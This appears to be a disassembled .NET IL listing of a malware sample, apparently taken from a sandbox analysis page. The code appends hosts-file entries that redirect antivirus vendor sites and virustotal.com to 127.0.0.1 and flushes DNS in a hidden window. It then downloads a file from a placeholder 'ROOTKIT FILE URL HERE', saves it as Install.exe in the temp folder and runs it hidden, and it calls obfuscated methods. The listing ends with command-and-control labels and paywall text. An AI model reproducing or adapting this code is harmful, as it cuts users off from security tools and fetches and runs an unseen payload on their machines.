dup <null>
ldc.i4.s 42
ldstr 127.0.0.1 www.sophos.com
stelem.ref <null>
dup <null>
ldc.i4.s 43
ldstr 127.0.0.1 home.sophos.com
stelem.ref <null>
dup <null>
ldc.i4.s 44
ldstr 127.0.0.1 www.home.sophos.com
stelem.ref <null>
dup <null>
ldc.i4.s 45
ldstr 127.0.0.1 adaware.com
stelem.ref <null>
dup <null>
ldc.i4.s 46
ldstr 127.0.0.1 www.adaware.com
stelem.ref <null>
dup <null>
ldc.i4.s 47
ldstr 127.0.0.1 ahnlab.com
stelem.ref <null>
dup <null>
ldc.i4.s 48
ldstr 127.0.0.1 www.ahnlab.com
stelem.ref <null>
dup <null>
ldc.i4.s 49
ldstr 127.0.0.1 avira.com
stelem.ref <null>
dup <null>
ldc.i4.s 50
ldstr 127.0.0.1 www.avira.com
stelem.ref <null>
dup <null>
ldc.i4.s 51
ldstr 127.0.0.1 bullguard.com
stelem.ref <null>
dup <null>
ldc.i4.s 52
ldstr 127.0.0.1 www.bullguard.com
stelem.ref <null>
dup <null>
ldc.i4.s 53
ldstr 127.0.0.1 clamav.net
stelem.ref <null>
dup <null>
ldc.i4.s 54
ldstr 127.0.0.1 www.clamav.net
stelem.ref <null>
dup <null>
ldc.i4.s 55
ldstr 127.0.0.1 drweb.com
stelem.ref <null>
dup <null>
ldc.i4.s 56
ldstr 127.0.0.1 www.drweb.com
stelem.ref <null>
dup <null>
ldc.i4.s 57
ldstr 127.0.0.1 emsisoft.com
stelem.ref <null>
dup <null>
ldc.i4.s 58
ldstr 127.0.0.1 www.emsisoft.com
stelem.ref <null>
dup <null>
ldc.i4.s 59
ldstr 127.0.0.1 f-secure.com
stelem.ref <null>
dup <null>
ldc.i4.s 60
ldstr 127.0.0.1 www.f-secure.com
stelem.ref <null>
dup <null>
ldc.i4.s 61
ldstr 127.0.0.1 pandasecurity.com
stelem.ref <null>
dup <null>
ldc.i4.s 62
ldstr 127.0.0.1 www.pandasecurity.com
stelem.ref <null>
dup <null>
ldc.i4.s 63
ldstr 127.0.0.1 zonealarm.com
stelem.ref <null>
dup <null>
ldc.i4.s 64
ldstr 127.0.0.1 www.zonealarm.com
stelem.ref <null>
dup <null>
ldc.i4.s 65
ldstr 127.0.0.1 trendmicro.com
stelem.ref <null>
dup <null>
ldc.i4.s 66
ldstr 127.0.0.1 www.trendmicro.com
stelem.ref <null>
dup <null>
ldc.i4.s 67
ldstr 127.0.0.1 ccleaner.com
stelem.ref <null>
dup <null>
ldc.i4.s 68
ldstr 127.0.0.1 www.ccleaner.com
stelem.ref <null>
dup <null>
ldc.i4.s 69
ldstr 127.0.0.1 virustotal.com
stelem.ref <null>
dup <null>
ldc.i4.s 70
ldstr 127.0.0.1 www.virustotal.com
stelem.ref <null>
stloc.1 <null>
ldc.i4.s 37
call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder)
ldstr drivers\etc\hosts
call System.String System.IO.Path::Combine(System.String,System.String)
call System.IO.StreamWriter System.IO.File::AppendText(System.String)
stloc.s V_5
ldloc.1 <null>
stloc.s V_6
ldc.i4.0 <null>
stloc.s V_7
br.s IL_0372: ldloc.s V_7
ldloc.s V_6
ldloc.s V_7
ldelem.ref <null>
stloc.s V_8
ldloc.s V_5
ldloc.s V_8
callvirt System.Void System.IO.TextWriter::WriteLine(System.String)
ldloc.s V_7
ldc.i4.1 <null>
add <null>
stloc.s V_7
ldloc.s V_7
ldloc.s V_6
ldlen <null>
conv.i4 <null>
blt.s IL_035C: ldloc.s V_6
leave.s IL_0388: ldstr "ipconfig"
ldloc.s V_5
brfalse.s IL_0387: endfinally
ldloc.s V_5
callvirt System.Void System.IDisposable::Dispose()
endfinally <null>
ldstr ipconfig
ldstr /flushdns
newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String)
dup <null>
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean)
dup <null>
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle)
call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo)
dup <null>
brtrue.s IL_03B0: call System.Void System.Diagnostics.Process::WaitForExit()
pop <null>
br.s IL_03B5: leave.s IL_03BA
call System.Void System.Diagnostics.Process::WaitForExit()
leave.s IL_03BA: ldstr "ROOTKIT FILE URL HERE"
pop <null>
leave.s IL_03BA: ldstr "ROOTKIT FILE URL HERE"
ldstr ROOTKIT FILE URL HERE
stloc.2 <null>
call System.String System.IO.Path::GetTempPath()
ldstr Install.exe
call System.String System.IO.Path::Combine(System.String,System.String)
stloc.3 <null>
newobj System.Void System.Net.WebClient::.ctor()
stloc.s V_10
ldloc.s V_10
ldloc.2 <null>
ldloc.3 <null>
callvirt System.Void System.Net.WebClient::DownloadFile(System.String,System.String)
leave.s IL_03EE: newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor()
ldloc.s V_10
brfalse.s IL_03ED: endfinally
ldloc.s V_10
callvirt System.Void System.IDisposable::Dispose()
endfinally <null>
newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor()
stloc.s V_9
ldloc.s V_9
ldloc.3 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String)
ldloc.s V_9
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle)
ldloc.s V_9
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean)
ldloc.s V_9
ldc.i4.0 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean)
ldloc.s V_9
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean)
newobj System.Void System.Diagnostics.Process::.ctor()
dup <null>
ldloc.s V_9
callvirt System.Void System.Diagnostics.Process::set_StartInfo(System.Diagnostics.ProcessStartInfo)
callvirt System.Boolean System.Diagnostics.Process::Start()
pop <null>
leave.s IL_0435: call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::賕턉䖺籾奼볆㯺ᒓ荓믏⿠㥥ꥧ�ᒬ笺彇()
pop <null>
leave.s IL_0435: call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::賕턉䖺籾奼볆㯺ᒓ荓믏⿠㥥ꥧ�ᒬ笺彇()
call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::賕턉䖺籾奼볆㯺ᒓ荓믏⿠㥥ꥧ�ᒬ笺彇()
call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::᥈즏衛ⳛ讕缢�諈崄쟸买ᥤ௱熾옡()
call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::퍸ᅤꋲ쉹窷趝㶤㝊䑩៩�싕쀎촅욘俛ᮓ爎�()
ret <null>
CnC CNCmalicious
c2.ethhuhuhuhuhuhuhu
Port PORTmalicious
4huhuhuhu
Full artefact values (URLs, paths, registry keys, scripts…) are available with Essential.
Unlock with Essential
An error has occurred. This application may no longer respond until reloaded. Reload 🗙